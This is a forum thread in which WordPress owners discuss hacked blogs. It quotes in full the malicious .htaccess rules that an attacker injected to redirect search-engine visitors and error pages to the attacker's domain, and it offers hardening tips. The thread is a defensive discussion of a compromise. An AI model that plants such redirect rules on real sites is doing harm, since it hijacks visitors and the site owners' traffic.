WordPress Blogs Hacked

BlackBeret

Regular Member
Joined
Jul 12, 2008
Messages
257
Reaction score
62
A couple of my blogs got hacked. They entered the following code in a couple of places:

Code:
RewriteEngine On
Options +FollowSymlinks
RewriteBase /


RewriteCond %{HTTP_REFERER} .*google.* [OR] 
RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
RewriteCond %{HTTP_REFERER} .*search.* [OR] 
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* 
RewriteRule ^(.*)$ http://xxxxxxxxxxxxxx.com/v-web/index2.html [R=301,L]

ErrorDocument 401 http://xxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 403 http://xxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 404 http://xxxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 500 http://xxxxxxxxxxxxxxxxx.com/v-web/index2.html

The xxxxxxxxxxxxxxxxxxx is their domain name that I removed.

Most of the codes were in the wp-content folder and subfolders (plugins,themes).

I can't figure out what they are trying to do. It looks like they are trying to make a bunch of MFA sites with SE results. Or maybe redirect all the search engine traffic my site might have gotten to their site?

Any ideas?
 
A couple of my blogs got hacked. They entered the following code in a couple of places:

Code:
RewriteEngine On
Options +FollowSymlinks
RewriteBase /


RewriteCond %{HTTP_REFERER} .*google.* [OR] 
RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
RewriteCond %{HTTP_REFERER} .*search.* [OR] 
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* 
RewriteRule ^(.*)$ http://xxxxxxxxxxxxxx.com/v-web/index2.html [R=301,L]

ErrorDocument 401 http://xxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 403 http://xxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 404 http://xxxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 500 http://xxxxxxxxxxxxxxxxx.com/v-web/index2.html

The xxxxxxxxxxxxxxxxxxx is their domain name that I removed.

Most of the codes were in the wp-content folder and subfolders (plugins,themes).

I can't figure out what they are trying to do. It looks like they are trying to make a bunch of MFA sites with SE results. Or maybe redirect all the search engine traffic my site might have gotten to their site?

Any ideas?
Is it these guys?
Code:
a3r0fl1ghttra1n1ng.c0m
 
It looks like it is telling spiders to rank his page instead of yours. Not sure though.
 
I just did a search in google for the following line:
Code:
.com/v-web/index2.html

trying to find more information and BlackHatWorld came up number one.

I thought stuff inside the code tags wasn't searchable by the search engines. Somebody might want to take a look at the board settings if it isn't supposed to be searchable.
 
Nice job Kreskin.

And how would you know that?

Haha. It's been a long time since I've seen someone use the name Kreskin in writing, but the Randal avatar sort of explains it.

Someone I know had an issue with the same thing, that's how I knew. Whoever is doing it started doing it a while ago.
 
How do you find such things in your blogs code? Are you using a software to scan the codes?
 
How do you find such things in your blogs code? Are you using a software to scan the codes?

Maybe after he saw wierd things happen in hes blog he start to check the files.
You can use "Notepad++", its good software to search in many docs.
 
I was looking in the File Manager in my cPanel for something else and I noticed all these extra files. I started opening them to see what they were and you see what I found.

Another time I found someone had hacked by viewing my stats in cPanel. There were a lot of people landing on a page that I didn't make. Turned out to be a PayPal phishing scam, but I've had a couple of bank phishing scams also. Any time you see a landing page with the name of a bank in it in your stats it's probably a phish. It got so bad my host shut down a couple of my sites. Neither of us could figure out where they got in.
 
My blogs were hacked about a week ago; I found out the night before I had a flight scheduled so wasn't able to do anything about it.. wasn't for SE targeting, they plastered Xanax ads all over my site in the header, footer, sidebar, etc. They also replaced my adsense pub-id with theirs! Since I was about to go on vacation, I had a friend clean up my code for me since we share the server my sites are on.. I got excited when he called to tell me they had put their adsense ID in, but that quickly faded when he told me he forgot to save the hacked version of the site and had lost the hacker's info...

Good luck getting your blogs fixed and secured, I'm still trying to figure out how they got in. Several core PHP files in the wordpress install and some plugins were changed, but that still doesn't tell me how they did it.
 
i was on another forum the other day and the mod suggested this site, i dont know if it would help, its a little beyond me. good luck

Code:
http://php-ids.org/


Welcome to the PHPIDS website!

On this site you can find a collection of resources relating to PHPIDS including files, documentation, a friendly forum and a cool demo that shows off some of the best features of PHPIDS.

PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user?s session.

PHPIDS enables you to see who?s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it?s licensed under the LGPL!

Greetings and stay tuned?
The PHPIDS Team
 
damn... my blog got hacked too.. Completely wiped out.. nothing left..
thank god, i had a backup available...

*** Nick goes to unzip the backup ***

*** WTF?? Backup was not complete...!! And, he counts his losses ***

I lost my theme modifications, images inside posts, and what not.. thank god atleast the database backup was complete or I was ruined....!! :D
 
I just did a search in google for the following line:
Code:
.com/v-web/index2.html

trying to find more information and BlackHatWorld came up number one.

I thought stuff inside the code tags wasn't searchable by the search engines. Somebody might want to take a look at the board settings if it isn't supposed to be searchable.

Search results now show your post saying that the Info inside
Code:
 tags is searchable by search engines. made me laugh!

Appreciate the link above as my site constantly seems to be attacked in some form or another
 
This is very scary, anyone want's to investigate instead of only telling dramatic stories?

Which WP version and which plugins did you use?

Just to mention that... you also know... there are some (even popular) plugins which do nasty things.
 
WP 2.0.3 (haven't updated that site in a while!), and a friend who was looking at it for me while I was on vacation said the error was a security hole in the xmlrpc.php file.. I'm still not sure how that allowed the theme files to be edited, but I'm not much of a hacker (nor do I care to be).

edit: theme is Greenery v2, but I don't think the theme had anything to do with it because another blog on the same server was hacked and was running a totally different theme... and a different wp version as well.. (also out of date)

I'm going to be taking some steps to secure the site, and will roll those out to all of my other blogs as well.. starting with upgrading them all to WP 2.7...
 
Last edited:
bl4ck1ce, honestly you need to upgrade pronto. Wordpress has made significant changes since then.

Another thing (this goes for everyone), see if you have the following code in your theme's header.php and remove it, it serves no real purpose.. actually it does.. tells people, it tells people what version of wordpress you are using, and if they care, they'd know the vulnerabilities that your blog is exposed to.
Code:
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />

btw. just change it in the 'Main Theme' and leave it elsewhere. Sorry about pointing it out, I have seen people just change all of 'em at one go with dreamweaver.

Cheers!!
 
WP 2.0.3 (haven't updated that site in a while!), and a friend who was looking at it for me while I was on vacation said the error was a security hole in the xmlrpc.php file.. I'm still not sure how that allowed the theme files to be edited, but I'm not much of a hacker (nor do I care to be).

edit: theme is Greenery v2, but I don't think the theme had anything to do with it because another blog on the same server was hacked and was running a totally different theme... and a different wp version as well.. (also out of date)

I'm going to be taking some steps to secure the site, and will roll those out to all of my other blogs as well.. starting with upgrading them all to WP 2.7...

Dint realize you had specified the theme, I downloaded it and checked it. It does include the meta tag in the header.php on line 10 that I recommended for removal, hence it is responsible to a certain extent for the hacking. Just remove that piece of code.

Also as I mentioned in the last post about also checking the footer.php, that obviously does not apply to the meta tag but rather this code part of the code:

PHP:
<?php bloginfo('version'); ?>

Hope this help!!

Cheers!!
 
Back
Top